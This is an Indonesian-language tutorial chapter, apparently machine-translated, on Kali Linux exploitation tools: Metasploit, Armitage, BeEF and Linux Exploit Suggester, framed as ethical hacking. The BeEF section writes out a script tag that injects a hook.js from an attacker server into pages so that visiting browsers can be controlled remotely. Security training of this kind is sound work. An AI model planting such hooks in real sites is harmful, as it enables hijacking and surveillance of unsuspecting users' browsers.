Kali Linux - Alat Eksploitasi
Pada bab ini, kita akan belajar tentang berbagai alat eksploitasi yang ditawarkan oleh Kali Linux.
Metasploit
Seperti yang kami sebutkan sebelumnya, Metasploit adalah produk dari Rapid7 dan sebagian besar sumber daya dapat ditemukan di halaman web mereka www.metasploit.com . Ini tersedia dalam dua versi - edisi komersial dan gratis. Perbedaan antara kedua versi ini tidak banyak sehingga, dalam hal ini kami akan menggunakan versi Komunitas (gratis).
Sebagai Ethical Hacker, Anda akan menggunakan "Kali Ditribution" yang memiliki versi komunitas Metasploit yang disematkan, bersama dengan alat peretasan etis lainnya yang sangat nyaman dengan menghemat waktu instalasi. Namun, jika Anda ingin menginstal sebagai alat terpisah, ini adalah aplikasi yang dapat diinstal di sistem operasi seperti Linux, Windows, dan OS X.
Pertama, buka Konsol Metasploit di Kali. Lalu, buka Aplikasi → Alat Eksploitasi → Metasploit.
Setelah itu dimulai, Anda akan melihat layar berikut, di mana versi Metasploit digarisbawahi dengan warna merah.
Di konsol, jika Anda menggunakan bantuan atau? simbol, itu akan menunjukkan kepada Anda daftar dengan perintah MSP bersama dengan deskripsinya. Anda dapat memilih berdasarkan kebutuhan Anda dan apa yang akan Anda gunakan.
Perintah administrasi penting lainnya adalah msfupdateyang membantu memperbarui metasploit dengan eksploitasi kerentanan terbaru. Setelah menjalankan perintah ini di konsol, Anda harus menunggu beberapa menit hingga pembaruan selesai.
Ini memiliki perintah bagus yang disebut "Pencarian" yang dapat Anda gunakan untuk menemukan apa yang Anda inginkan seperti yang ditunjukkan pada gambar berikut. Misalnya, saya ingin mencari eksploitasi yang terkait dengan Microsoft dan perintahnya bisamsf >search name:Microsoft type:exploit.
Di mana "search" adalah perintahnya, "name" adalah nama objek yang kita cari, dan "type" adalah jenis skrip yang kita cari.
Perintah lainnya adalah "info". Ini memberikan informasi mengenai modul atau platform yang digunakan, siapa penulisnya, referensi kerentanan, dan batasan muatan yang dapat dimilikinya.
Armitage
Armitage GUI untuk metasploit adalah alat pelengkap untuk metasploit. Ini memvisualisasikan target, merekomendasikan eksploitasi, dan memperlihatkan fitur pasca-eksploitasi lanjutan.
Mari kita buka, tetapi pertama-tama konsol metasploit harus dibuka dan dijalankan. Untuk membuka Armitage, buka Applications → Exploit Tools → Armitage.
Klik Connect tombol, seperti yang ditunjukkan pada tangkapan layar berikut.
Saat terbuka, Anda akan melihat layar berikut.
Armitage ramah pengguna. Area "Target" mencantumkan semua mesin yang telah Anda temukan dan sedang Anda tangani, target yang diretas berwarna merah dengan badai petir di atasnya.
Setelah Anda meretas target, Anda dapat mengklik kanan padanya dan melanjutkan penjelajahan dengan apa yang perlu Anda lakukan seperti menjelajahi (menjelajahi) folder.
Di GUI berikut, Anda akan melihat tampilan untuk folder, yang disebut konsol. Hanya dengan mengklik folder, Anda dapat menavigasi folder tanpa perlu perintah metasploit.
Di sisi kanan GUI, adalah bagian di mana modul kerentanan terdaftar.
Daging sapi
BeEF adalah singkatan dari Browser Exploitation Framework. Ini adalah alat pengujian penetrasi yang berfokus pada browser web. BeEF memungkinkan penguji penetrasi profesional untuk menilai postur keamanan aktual dari lingkungan target menggunakan vektor serangan sisi klien.
Pertama, Anda harus memperbarui paket Kali menggunakan perintah berikut -
root@kali:/# apt-get update
root@kali:/# apt-get install beef-xss
Untuk memulai, gunakan perintah berikut -
root@kali:/# cd /usr/share/beef-xss
root@kali:/# ./beef
Buka browser dan masukkan nama pengguna dan kata sandi: beef.
BeEF hook adalah file JavaScript yang dihosting di server BeEF yang perlu dijalankan di browser klien. Ketika itu terjadi, itu memanggil kembali ke server BeEF yang mengkomunikasikan banyak informasi tentang target. Ini juga memungkinkan perintah dan modul tambahan untuk dijalankan terhadap target. Dalam contoh ini, lokasiBeEF hook ada di http://192.168.1.101:3000/hook.js.
Untuk menyerang browser, sertakan hook JavaScript di halaman yang akan dilihat klien. Ada beberapa cara untuk melakukannya, namun yang termudah adalah dengan memasukkan yang berikut ini ke dalam halaman dan membuat klien membukanya.
<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script>
Setelah halaman dimuat, kembali ke BeEF Control Panel dan klik "Online Browser" di kiri atas. Setelah beberapa detik, Anda akan melihat alamat IP Anda muncul yang mewakili browser yang terhubung. Mengarahkan kursor ke atas IP akan dengan cepat memberikan informasi seperti versi browser, sistem operasi, dan plugin apa yang diinstal.
Untuk menjalankan perintah dari jarak jauh, klik host "Milik". Kemudian, pada perintah klik modul yang ingin Anda jalankan, dan terakhir klik "Execute".
Linux Eksploitasi Suggester
Ini menyarankan kemungkinan eksploitasi diberikan versi rilis ‘uname -r’ dari Sistem Operasi Linux.
Untuk menjalankannya, ketik perintah berikut -
root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0
3.0.0 adalah versi kernel dari OS Linux yang ingin kami manfaatkan.